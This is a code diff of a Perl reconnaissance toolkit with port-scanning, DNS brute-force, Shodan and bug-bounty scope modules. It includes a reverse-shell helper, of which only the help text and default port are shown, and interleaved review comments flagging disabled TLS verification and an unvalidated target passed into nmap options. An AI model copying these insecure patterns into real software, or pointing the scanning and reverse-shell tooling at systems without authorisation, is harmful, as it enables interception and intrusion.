return 0; diff --git a/lib/Spellbook/Helper/Host_Normalization.pm b/lib/Spellbook/Helper/Host_Normalization.pm index cf234e4..a786063 100644 --- a/lib/Spellbook/Helper/Host_Normalization.pm +++ b/lib/Spellbook/Helper/Host_Normalization.pm 
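Review bot: In the rewritten inner loop of CDN_Checker, `$range -> overlaps($value)` is called on whatever `Net::IP -> new` returned, and that constructor yields undef for an entry it cannot parse, so one malformed range in the downloaded list ends the run with a method call on an undefined value. `$value` is also rebuilt from the same `$ip` on every iteration; I would build it once before the loops, `my $value = Net::IP -> new($ip) or return 0;`, and guard the range with `my $range = Net::IP -> new($_) or next;`. With the early `return @result;` gone, `$target` is now pushed once per matching range, so the returned list can contain duplicates. `decode_json` on the fetched body is unguarded as well, and an `eval { ... }` around it would keep a non-JSON response from killing the caller.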
@@ -14,7 +14,7 @@ package Spellbook::Helper::Host_Normalization { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } @@ -34,14 +34,11 @@ package Spellbook::Helper::Host_Normalization { } if ($help) { - return<<"EOT"; - -Helper::Host_Normalization -========================== --h, --help See this menu --t, --target Define a target to normalize\n\n"; - -EOT + return " + \rHelper::Host_Normalization + \r========================== + \r-h, --help See this menu + \r-t, --target Define a target to normalize\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/Permutations.pm b/lib/Spellbook/Helper/Permutations.pm index 1344ab5..cc615cd 100644 --- a/lib/Spellbook/Helper/Permutations.pm +++ b/lib/Spellbook/Helper/Permutations.pm @@ -25,23 +25,20 @@ package Spellbook::Helper::Permutations { $chars[$i] = $chars[$random]; $chars[$random] = $temp; } - + push @result, join("", @chars); } - - return @result; + + return @result; } if ($help) { - return<<"EOT"; - -Helper::Permutations -===================== --h, --help See this menu --v, --value Provide a seed --r, --repeat Quantities of repetitions\n\n"; - -EOT + return " + \rHelper::Permutations + \r===================== + \r-h, --help See this menu + \r-v, --value Provide a seed + \r-r, --repeat Quantities of repetitions\n\n"; } return 0; diff --git a/lib/Spellbook/Helper/Read_File.pm b/lib/Spellbook/Helper/Read_File.pm index cc39cba..a0c7ac8 100644 --- a/lib/Spellbook/Helper/Read_File.pm +++ b/lib/Spellbook/Helper/Read_File.pm @@ -2,13 +2,12 @@ package Spellbook::Helper::Read_File { use strict; use warnings; use Spellbook::Core::Module; - use Carp qw(croak); sub new { - my ($self, $parameters) = @_; + my ($self, $parameters)= @_; my ($help, $file, $entrypoint, @result); - Getopt::Long::GetOptionsFromArray( + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, "f|file=s" => \$file, 
@@ -16,36 +15,36 @@ package Spellbook::Helper::Read_File { ); if ($file) { - local $/ = "\n"; - open my $fh, "<", $file or croak "Failed to open file: $!"; - my @lines = <$fh>; - close $fh; + open (my $filename, "<", $file); - for my $line (@lines) { - chomp($line); + while (<$filename>) { + chomp ($_); if ($entrypoint) { - my $return = Spellbook::Core::Module->new($entrypoint, ["--target" => $line]); + my $return = Spellbook::Core::Module -> new ($entrypoint, ["--target" => $_]); + if ($return) { - push @result, $line; + push @result, $_; } } + else { - push @result, $line; + push @result, $_; } } - return @result; - } - return <<"EOT"; + close ($filename); -Helper::Read_File -===================== --h, --help See this menu --f, --file Define a file to read --e, --entrypoint Set a other module to send the output + return @result; + } -EOT + + return " + \rHelper::Read_File + \r===================== + \r-h, --help See this menu + \r-f, --file Define a file to read + \r-e, --entrypoint Set a other module to send the output\n\n"; } } diff --git a/lib/Spellbook/Helper/Reverse_Shell.pm b/lib/Spellbook/Helper/Reverse_Shell.pm index e5a22d1..5e7c3ae 100644 --- a/lib/Spellbook/Helper/Reverse_Shell.pm +++ b/lib/Spellbook/Helper/Reverse_Shell.pm @@ -6,7 +6,7 @@ package Spellbook::Helper::Reverse_Shell { sub new { my ($self, $parameters) = @_; my ($help, $target); - + my $port = 1337; my $lang = "perl"; 
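Review bot: `open (my $filename, "<", $file);` drops the failure check the old code had, so a missing or unreadable path now produces warnings and an empty list instead of an error; `open (my $filename, "<", $file) or die "Failed to open file: $!";` restores it without the Carp import that this patch removes. The loop also keeps each line in the global `$_` across the call to `Spellbook::Core::Module -> new`, and any code underneath that assigns `$_` without localizing it would change the value pushed to `@result`. `while (my $line = <$filename>)` with `chomp $line;` avoids that.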
@@ -28,18 +28,15 @@ package Spellbook::Helper::Reverse_Shell { } if ($help) { - return<<"EOT"; - -Helper::Reverse_Shell -===================== --h, --help See this menu --t, --target Set your IP/Host to send the reverse shell --p, --port Define a port to connect --l, --lang Default is perl, types avaible: perl, bash\n\n"; - -EOT + return " + \rHelper::Reverse_Shell + \r===================== + \r-h, --help See this menu + \r-t, --target Set your IP/Host to send the reverse shell + \r-p, --port Define a port to connect + \r-l, --lang Default is perl, types avaible: perl, bash\n\n"; } - + return 0; } } diff --git a/lib/Spellbook/Helper/Scope.pm b/lib/Spellbook/Helper/Scope.pm index 4320c8d..79de620 100644 --- a/lib/Spellbook/Helper/Scope.pm +++ b/lib/Spellbook/Helper/Scope.pm @@ -42,16 +42,16 @@ package Spellbook::Helper::Scope { push @results, $info; } } - + if ($save) { if ($keep && exists $yamlfile->[0]->{$save}) { push @{$yamlfile->[0]->{$save}}, @results; } - + else { $yamlfile->[0]->{$save} = [@results]; } - + $yamlfile->write($scope); } @@ -59,20 +59,17 @@ package Spellbook::Helper::Scope { } if ($help) { - return<<"EOT"; - -Helper::Scope -===================== --h, --help See this menu --S, --scope Define a YML file as a scope --i, --information Set an information to extract from your scope --e, --entrypoint Send informations to another entrypoint module --K, --keep Keep the current values in the file and add news values ---save Save the output on some attribute\n\n"; - -EOT + return " + \rHelper::Scope + \r===================== + \r-h, --help See this menu + \r-S, --scope Define a YML file as a scope + \r-i, --information Set an information to extract from your scope + \r-e, --entrypoint Send informations to another entrypoint module + \r-K, --keep Keep the current values in the file and add news values + \r--save Save the output on some attribute\n\n"; } - + return 0; } } 
diff --git a/lib/Spellbook/Helper/Uniq.pm b/lib/Spellbook/Helper/Uniq.pm index 7541696..d4f81a2 100644 --- a/lib/Spellbook/Helper/Uniq.pm +++ b/lib/Spellbook/Helper/Uniq.pm @@ -17,14 +17,11 @@ package Spellbook::Helper::Uniq { } if ($help) { - return<<"EOT"; - -Helper::Uniq -===================== --h, --help See this menu --v, --target Define a value\n\n"; - -EOT + return " + \rHelper::Uniq + \r===================== + \r-h, --help See this menu + \r-v, --target Define a value\n\n"; } return 0; diff --git a/lib/Spellbook/Parser/Nmap.pm b/lib/Spellbook/Parser/Nmap.pm index 2f464f0..6127b7b 100644 --- a/lib/Spellbook/Parser/Nmap.pm +++ b/lib/Spellbook/Parser/Nmap.pm @@ -2,7 +2,7 @@ package Spellbook::Parser::Nmap { use strict; use warnings; use XML::Simple; - + # https://metacpan.org/pod/Nmap::Parser sub new { @@ -18,14 +18,14 @@ package Spellbook::Parser::Nmap { if ($file) { my $xml = XML::Simple -> new(); my $data = $xml -> XMLin($file); - + my $host = $data -> {host} -> {address} -> {addr}; - + # foreach my $content (@{$data -> {host} -> {ports} -> {port}}) { # print Dumper($content); # push @result, $element -> {Key}; # } - + # my $state = $content -> {state} -> {state}; # if (($state eq "open") || ($state eq "filtered")) { @@ -36,19 +36,16 @@ package Spellbook::Parser::Nmap { # push @results, "$host -> [$protocol] | [$state]-> $port \t | $service\n"; # } # }; - + return @results; } if ($help) { - return<<"EOT"; - -Parser::Nmap -===================== --h, --help See this menu --f, --file Set an XML file from Nmap output\n\n"; - -EOT + return " + \rParser::Nmap + \r===================== + \r-h, --help See this menu + \r-f, --file Set an XML file from Nmap output\n\n"; } return 0; diff --git a/lib/Spellbook/Parser/Nozaki.pm b/lib/Spellbook/Parser/Nozaki.pm index fed200a..36f9551 100644 --- a/lib/Spellbook/Parser/Nozaki.pm +++ b/lib/Spellbook/Parser/Nozaki.pm 
@@ -25,14 +25,11 @@ package Spellbook::Parser::Nozaki { } if ($help) { - return<<"EOT"; - -Parser::Nozaki -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rParser::Nozaki + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Parser/S3_Bucket.pm b/lib/Spellbook/Parser/S3_Bucket.pm index 16288ba..acdd4aa 100644 --- a/lib/Spellbook/Parser/S3_Bucket.pm +++ b/lib/Spellbook/Parser/S3_Bucket.pm @@ -16,10 +16,10 @@ package Spellbook::Parser::S3_Bucket { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { - $target = "https://$target"; + if ($target !~ /^http(s)?:\/\//x) { + $target = "https://$target"; } - + if ($target !~ /\/$/x) { $target .= "/"; } my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -35,19 +35,16 @@ package Spellbook::Parser::S3_Bucket { } } } - + return @result; } if ($help) { - return<<"EOT"; - -Parser::Bucket -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rParser::Bucket + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Parser/Sitemap.pm b/lib/Spellbook/Parser/Sitemap.pm index 48c2ad7..8ffb154 100644 --- a/lib/Spellbook/Parser/Sitemap.pm +++ b/lib/Spellbook/Parser/Sitemap.pm @@ -15,7 +15,7 @@ package Spellbook::Parser::Sitemap { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } if ($target !~ /\/sitemap.xml$/x) { $target = "$target/sitemap.xml"; } my $userAgent = Spellbook::Core::UserAgent -> new(); 
@@ -33,19 +33,16 @@ package Spellbook::Parser::Sitemap { } } } - + return @result; } if ($help) { - return<<"EOT"; - -Parser::Sitemap -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rParser::Sitemap + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } return 0; diff --git a/lib/Spellbook/Platform/HackerOne.pm b/lib/Spellbook/Platform/HackerOne.pm index 739fa84..003a6a6 100644 --- a/lib/Spellbook/Platform/HackerOne.pm +++ b/lib/Spellbook/Platform/HackerOne.pm @@ -18,7 +18,7 @@ package Spellbook::Platform::HackerOne { ); my $token = Spellbook::Core::Credentials -> new(["--platform" => "hackerone"]); - + if ($token && $target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $api_url = "https://api.hackerone.com/v1/hackers/programs/$target"; @@ -35,7 +35,7 @@ package Spellbook::Platform::HackerOne { for my $scope (@{$data -> {"relationships"} -> {"structured_scopes"} -> {"data"}}) { if (($scope -> {"attributes"} -> {"asset_type"} eq "URL") && ($scope -> {"attributes"} -> {"eligible_for_bounty"})) { my $url = $scope -> {"attributes"} -> {"asset_identifier"}; - + push @result, Spellbook::Helper::Host_Normalization -> new(["--target" => $url]); } } @@ -45,18 +45,15 @@ package Spellbook::Platform::HackerOne { } if ($help) { - return<<"EOT"; - -Platform::HackerOne -===================== --h, --help See this menu --t, --target Program handle from HackerOne\n\n"; - -EOT + return " + \rPlatform::HackerOne + \r===================== + \r-h, --help See this menu + \r-t, --target Program handle from HackerOne\n\n"; } return 0; } -} +} 1; \ No newline at end of file diff --git a/lib/Spellbook/Platform/Intigriti.pm b/lib/Spellbook/Platform/Intigriti.pm index 8c049c3..4db7ac1 100644 --- a/lib/Spellbook/Platform/Intigriti.pm +++ b/lib/Spellbook/Platform/Intigriti.pm 
@@ -5,13 +5,10 @@ package Spellbook::Platform::Intigriti { sub new { my ($self, $parameters) = @_; - return<<"EOT"; - -Platform::Intigriti -=================== -This module is under development\n\n"; - -EOT + return " + \rPlatform::Intigriti + \r=================== + \rThis module is under development\n\n"; } } diff --git a/lib/Spellbook/Recon/DNS_Bruteforce.pm b/lib/Spellbook/Recon/DNS_Bruteforce.pm index 34d3a1c..22c74f0 100644 --- a/lib/Spellbook/Recon/DNS_Bruteforce.pm +++ b/lib/Spellbook/Recon/DNS_Bruteforce.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::DNS_Bruteforce { if (@file) { foreach my $line (@file) { my $return = Spellbook::Recon::Host_Resolv -> new (["--target" => "$line.$target"]); - + if ($return) { push @result, "$line.$target"; } @@ -31,17 +31,14 @@ package Spellbook::Recon::DNS_Bruteforce { return @result; } - + if ($help) { - return<<"EOT"; - -Recon::DNS_Bruteforce -===================== --h, --help See this menu --t, --target Set a domain as a target --f, --file Define a wordlist\n\n"; - -EOT + return " + \rRecon::DNS_Bruteforce + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain as a target + \r-f, --file Define a wordlist\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Detect_Error.pm b/lib/Spellbook/Recon/Detect_Error.pm index 987405d..56ce245 100644 --- a/lib/Spellbook/Recon/Detect_Error.pm +++ b/lib/Spellbook/Recon/Detect_Error.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Detect_Error { if ($target) { $target =~ s/^http(s)?:\/\///x; - + my $resolv = Net::DNS::Resolver -> new(); my $reply = $resolv -> search($target); @@ -30,7 +30,7 @@ package Spellbook::Recon::Detect_Error { if ($request -> code() == 404) { push @results, $target; - } + } } } } 
@@ -39,14 +39,11 @@ package Spellbook::Recon::Detect_Error { } if ($help) { - return<<"EOT"; - -Checker -============== --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rChecker + \r============== + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } } } diff --git a/lib/Spellbook/Recon/Dorking.pm b/lib/Spellbook/Recon/Dorking.pm index 1302d64..a3bbd8a 100644 --- a/lib/Spellbook/Recon/Dorking.pm +++ b/lib/Spellbook/Recon/Dorking.pm @@ -20,13 +20,11 @@ package Spellbook::Recon::Dorking { } if ($help) { - return<<"EOT"; - -Recon::Dorking -===================== --h, --help See this menu\n\n"; - -EOT + return " + \rRecon::Dorking + \r===================== + \r-h, --help See this menu + \r \n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Extract_Links.pm b/lib/Spellbook/Recon/Extract_Links.pm index 46b6c1a..3fb8bde 100755 --- a/lib/Spellbook/Recon/Extract_Links.pm +++ b/lib/Spellbook/Recon/Extract_Links.pm @@ -22,7 +22,7 @@ package Spellbook::Recon::Extract_Links { ssl_opts => { verify_hostname => 0 } ); - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -30,12 +30,12 @@ package Spellbook::Recon::Extract_Links { my $request = $mech -> get($target); my @links = $mech -> links(); - + for my $link (@links) { my $url = $link -> url(); - if (($url) && ($url !~ m/#/x) && ($url !~ /^http(?:s)?:\/\//x)) { - if ($url !~ /^\//x) { + if (($url) && ($url !~ m/#/x) && ($url !~ /^http(s)?:\/\//x)) { + if ($url !~ /^\//x) { $url = "/" . $url; } 
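Review bot: The constructor call that closes at the top of the first Extract_Links hunk passes `ssl_opts => { verify_hostname => 0 }`, so the `https://` default applied on the next lines gives no assurance about which server actually answered. The links collected from that response are returned as results, so a host on the network path could presumably supply them. If the setting is needed for hosts with broken certificates, I would make it opt-in, for example an `--insecure` option that defaults to verification on, with a comment such as `# verification disabled only on explicit request`. The call begins outside the hunk, so other options may already be set there.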
@@ -57,15 +57,12 @@ package Spellbook::Recon::Extract_Links { } if ($help) { - return<<"EOT"; - -Recon::Extrac_Links -===================== --h, --help See this menu --t, --target Define a web page to extract all links --d, --deep Draft recursive function\n\n"; - -EOT + return " + \rRecon::Extrac_Links + \r===================== + \r-h, --help See this menu + \r-t, --target Define a web page to extract all links + \r-d, --deep Draft recursive function\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Find_Emails.pm b/lib/Spellbook/Recon/Find_Emails.pm index 21674e0..f1d9a38 100644 --- a/lib/Spellbook/Recon/Find_Emails.pm +++ b/lib/Spellbook/Recon/Find_Emails.pm @@ -30,18 +30,15 @@ package Spellbook::Recon::Find_Emails { } return @result; - } + } } if ($help) { - return<<"EOT"; - -Recon::Find_Emails -===================== --h, --help See this menu --t, --target Define a domain to find emails\n"; - -EOT + return " + \rRecon::Find_Emails + \r===================== + \r-h, --help See this menu + \r-t, --target Define a domain to find emails\n"; } return 0; diff --git a/lib/Spellbook/Recon/Get_IP.pm b/lib/Spellbook/Recon/Get_IP.pm index e3f8533..e6eb2ad 100644 --- a/lib/Spellbook/Recon/Get_IP.pm +++ b/lib/Spellbook/Recon/Get_IP.pm @@ -22,18 +22,15 @@ package Spellbook::Recon::Get_IP { if ($ip) { return inet_ntoa($ip); - } + } } if ($help) { - return<<"EOT"; - -Recon::Get_IP -===================== --h, --help See this menu --t, --target Set a domain to get the IP\n\n"; - -EOT + return " + \rRecon::Get_IP + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain to get the IP\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/HTTP_Probe.pm b/lib/Spellbook/Recon/HTTP_Probe.pm index ee5e606..49e9467 100644 --- a/lib/Spellbook/Recon/HTTP_Probe.pm +++ b/lib/Spellbook/Recon/HTTP_Probe.pm 
@@ -14,14 +14,14 @@ package Spellbook::Recon::HTTP_Probe { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $response = $userAgent -> get($target); - if ($response -> code() != 500) { + if ($response -> code() != 500) { push @result, $target; } @@ -29,14 +29,11 @@ package Spellbook::Recon::HTTP_Probe { } if ($help) { - return<<"EOT"; - -Recon::HTTP_Probe -===================== --h, --help See this menu --t, --target Define a target to make a HTTP request probe\n\n"; - -EOT + return " + \rRecon::HTTP_Probe + \r===================== + \r-h, --help See this menu + \r-t, --target Define a target to make a HTTP request probe\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/HaveBeenPwned.pm b/lib/Spellbook/Recon/HaveBeenPwned.pm index 1621406..b2c5adf 100644 --- a/lib/Spellbook/Recon/HaveBeenPwned.pm +++ b/lib/Spellbook/Recon/HaveBeenPwned.pm @@ -6,7 +6,7 @@ package Spellbook::Recon::HaveBeenPwned { use Spellbook::Core::Credentials; # THIS IS A DRAFT MODULE - + sub new { my ($self, $parameters) = @_; my ($help, $target); @@ -33,14 +33,11 @@ package Spellbook::Recon::HaveBeenPwned { } if ($help) { - return<<"EOT"; - -Recon::HaveBeenPwned -==================== --h, --help See this menu --e, --target Define an e-mail address as a target\n\n"; - -EOT + return " + \rRecon::HaveBeenPwned + \r==================== + \r-h, --help See this menu + \r-e, --target Define an e-mail address as a target\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Host_Resolv.pm b/lib/Spellbook/Recon/Host_Resolv.pm index 8de4dde..7a79ac0 100644 --- a/lib/Spellbook/Recon/Host_Resolv.pm +++ b/lib/Spellbook/Recon/Host_Resolv.pm 
@@ -23,18 +23,15 @@ package Spellbook::Recon::Host_Resolv { if ($search) { return $target; - } + } } - + if ($help) { - return<<"EOT"; - -Recon::Host_Resolv -===================== --h, --help See this menu --t, --target Set a domain to get the IP\n\n"; - -EOT + return " + \rRecon::Host_Resolv + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain to get the IP\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Internal_DNS.pm b/lib/Spellbook/Recon/Internal_DNS.pm index 79a3622..9dabb96 100644 --- a/lib/Spellbook/Recon/Internal_DNS.pm +++ b/lib/Spellbook/Recon/Internal_DNS.pm @@ -26,14 +26,11 @@ package Spellbook::Recon::Internal_DNS { } if ($help) { - return<<"EOT"; - -Recon::Internal_DNS -===================== --h, --help See this menu --t, --target Set a domain to get the IP\n\n"; - -EOT + return " + \rRecon::Internal_DNS + \r===================== + \r-h, --help See this menu + \r-t, --target Set a domain to get the IP\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Masscan.pm b/lib/Spellbook/Recon/Masscan.pm index d460388..205742c 100644 --- a/lib/Spellbook/Recon/Masscan.pm +++ b/lib/Spellbook/Recon/Masscan.pm @@ -5,11 +5,11 @@ package Spellbook::Recon::Masscan { use List::MoreUtils qw(uniq); use Spellbook::Recon::Get_IP; use Spellbook::Helper::CDN_Checker; - + sub new { my ($self, $parameters) = @_; my ($help, @target, @ports, @result, $skip_cdn); - + my @arguments = qw(--banners); Getopt::Long::GetOptionsFromArray ( @@ -19,7 +19,7 @@ package Spellbook::Recon::Masscan { "p|port=s" => \@ports, "a|arguments" => \@arguments, "skip-cdn" => \$skip_cdn - ); + ); if (@target) { if (!@ports) { @ports = "1-65535"; } @@ -28,7 +28,7 @@ package Spellbook::Recon::Masscan { my $CDN_Checker = Spellbook::Helper::CDN_Checker -> new (["--target" => $target[0]]); if ($CDN_Checker) { - return 0; + return 0; } } 
@@ -45,26 +45,23 @@ package Spellbook::Recon::Masscan { if ($scan) { my $result = $masscan -> scan_results(); - foreach my $value (@{$result -> {"scan_results"}}) { + foreach my $value (@{$result -> {"scan_results"}}) { push @result, $target[0] . ":" . $value -> {"ports"} -> [0] -> {"port"}; } - + return uniq @result; } - } + } if ($help) { - return<<"EOT"; - -Recon::Masscan -===================== --h, --help See this menu --t, --target Set an Domain/IP to make a port scanning using masscan --p, --ports Define ports to scan --a, --arguments Parameters to masscanner ---skip-cdn Skip the CDN check\n\n"; - -EOT + return " + \rRecon::Masscan + \r===================== + \r-h, --help See this menu + \r-t, --target Set an Domain/IP to make a port scanning using masscan + \r-p, --ports Define ports to scan + \r-a, --arguments Parameters to masscanner + \r--skip-cdn Skip the CDN check\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Nmap_Scanner.pm b/lib/Spellbook/Recon/Nmap_Scanner.pm index 15278ad..23ea636 100644 --- a/lib/Spellbook/Recon/Nmap_Scanner.pm +++ b/lib/Spellbook/Recon/Nmap_Scanner.pm @@ -2,28 +2,28 @@ package Spellbook::Recon::Nmap_Scanner { use strict; use warnings; use Nmap::Scanner; # https://metacpan.org/pod/Nmap::Scanner - + sub scan_started { my $self = shift; my $host = shift; - + my $hostname = $host -> hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); my $status = $host -> status(); - + print "$hostname ($addresses) is $status\n"; return 0; } - + sub port_found { my $self = shift; my $host = shift; my $port = shift; - + my $name = $host->hostname(); my $addresses = join(',', map {$_ -> addr()} $host -> addresses()); - + print "On host $name ($addresses), found ", $port->state()," port ", join('/', $port -> protocol(), $port -> portid()), "\n"; 
@@ -48,23 +48,20 @@ package Spellbook::Recon::Nmap_Scanner { $scanner -> register_scan_started_event(\&scan_started); $scanner -> register_port_found_event(\&port_found); $scanner -> scan("-sS -p 1-1024 -O $target"); - + my $results = $scanner -> scan(); # print Dumper($results); return @result; - } + } if ($help) { - return<<"EOT"; - -Recon::Nmap_Scanner -===================== --h, --help See this menu --t, --target Set an IP to run the scanner\n\n"; - -EOT + return " + \rRecon::Nmap_Scanner + \r===================== + \r-h, --help See this menu + \r-t, --target Set an IP to run the scanner\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Query_Shodan.pm b/lib/Spellbook/Recon/Query_Shodan.pm index 0b109b0..b4453c2 100644 --- a/lib/Spellbook/Recon/Query_Shodan.pm +++ b/lib/Spellbook/Recon/Query_Shodan.pm @@ -24,7 +24,7 @@ package Spellbook::Recon::Query_Shodan { if ($httpCode == 200) { my $content = decode_json($request -> content()); - + foreach my $data (@{$content -> {"matches"}}) { my $hostname = $data -> {"ip_str"}; my $port = $data -> {"port"}; @@ -37,14 +37,11 @@ package Spellbook::Recon::Query_Shodan { } if ($help) { - return<<"EOT"; - -Recon::Shodan -===================== --h, --help See this menu --t, --query Define a query\n\n"; - -EOT + return " + \rRecon::Shodan + \r===================== + \r-h, --help See this menu + \r-t, --query Define a query\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Shodan_Enumeration.pm b/lib/Spellbook/Recon/Shodan_Enumeration.pm index bd02dae..d8edb03 100644 --- a/lib/Spellbook/Recon/Shodan_Enumeration.pm +++ b/lib/Spellbook/Recon/Shodan_Enumeration.pm @@ -21,7 +21,7 @@ package Spellbook::Recon::Shodan_Enumeration { if ($target =~ /^http(s)?:\/\//x) { $target =~ s/^http(s)?:\/\///x; } - + my $validate = is_domain($target); if ($validate) { 
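Review bot: `$scanner -> scan("-sS -p 1-1024 -O $target");` in the second Nmap_Scanner hunk interpolates `$target` into the nmap option string with no validation visible here, so a value containing spaces or a leading `-` would be read as additional options rather than as a host. An anchored check before the call, such as `return 0 if $target !~ /\A[A-Za-z0-9][A-Za-z0-9.:-]*\z/;`, keeps it to a hostname or address. The scan is then invoked a second time by `my $results = $scanner -> scan();`, and `@result` is returned without anything in the hunk adding to it; a single call whose return value is kept would be enough. The body of `new` starts above the hunk, so a check may already exist there.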
@@ -61,14 +61,11 @@ package Spellbook::Recon::Shodan_Enumeration { } if ($help) { - return<<"EOT"; - -Recon::Shodan_Enum -===================== --h, --help See this menu --t, --target Set an IP to see infos on shodan API\n\n"; - -EOT + return " + \rRecon::Shodan_Enum + \r===================== + \r-h, --help See this menu + \r-t, --target Set an IP to see infos on shodan API\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Subdomain_Enumeration.pm b/lib/Spellbook/Recon/Subdomain_Enumeration.pm index 2bcd126..1d06c66 100644 --- a/lib/Spellbook/Recon/Subdomain_Enumeration.pm +++ b/lib/Spellbook/Recon/Subdomain_Enumeration.pm @@ -5,7 +5,7 @@ package Spellbook::Recon::Subdomain_Enumeration { use List::MoreUtils qw(uniq); use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -50,17 +50,14 @@ package Spellbook::Recon::Subdomain_Enumeration { } return uniq @result; - } + } if ($help) { - return<<"EOT"; - -Recon::Subdomain_Enumeration -===================== --h, --help See this menu --t, --target Find subdomains from a target using SecurityTrails\n\n"; - -EOT + return " + \rRecon::Subdomain_Enumeration + \r===================== + \r-h, --help See this menu + \r-t, --target Find subdomains from a target using SecurityTrails\n\n"; } return 0; diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm index 1f411df..0801727 100644 --- a/lib/Spellbook/Recon/Technologies.pm +++ b/lib/Spellbook/Recon/Technologies.pm @@ -16,7 +16,7 @@ package Spellbook::Recon::Technologies { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } 
@@ -36,14 +36,11 @@ package Spellbook::Recon::Technologies { } if ($help) { - return<<"EOT"; - -Recon::Detect_Tech -===================== --t, --target Define the target --h, --help See this menu\n\n"; - -EOT + return " + \rRecon::Detect_Tech + \r===================== + \r-t, --target Define the target + \r-h, --help See this menu\n\n"; } return 1; diff --git a/lib/Spellbook/Recon/WayBackUrls.pm b/lib/Spellbook/Recon/WayBackUrls.pm index d78d397..ffce702 100644 --- a/lib/Spellbook/Recon/WayBackUrls.pm +++ b/lib/Spellbook/Recon/WayBackUrls.pm @@ -3,7 +3,7 @@ package Spellbook::Recon::WayBackUrls { use warnings; use JSON; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,11 +14,11 @@ package Spellbook::Recon::WayBackUrls { "t|target=s" => \$target ); - if ($target) { + if ($target) { my $endpoint = "http://web.archive.org/cdx/search/cdx?url=$target/*&output=json&collapse=urlkey"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get($endpoint); - + if (($request -> code() == 200) && ($request -> content ne "[]")) { my $content = decode_json($request -> content); @@ -33,14 +33,11 @@ package Spellbook::Recon::WayBackUrls { } if ($help) { - return<<"EOT"; - -Recon::WaybackUrls -===================== --h, --help See this menu --t, --target Set an website to see paths from WayBackMachine\n"; - -EOT + return " + \rRecon::WaybackUrls + \r===================== + \r-h, --help See this menu + \r-t, --target Set an website to see paths from WayBackMachine\n"; } return 0; diff --git a/spellbook.pl b/spellbook.pl index b1792da..fcef7a0 100755 --- a/spellbook.pl +++ b/spellbook.pl @@ -11,7 +11,7 @@ sub main { my ($search, $module, @result); - + Getopt::Long::GetOptions ( "s|search=s" => \$search, "m|module=s" => \$module @@ -25,8 +25,6 @@ sub main { } return Spellbook::Core::Helper -> new() unless $search || $module; - - return 0; } main(); \ No newline at end of file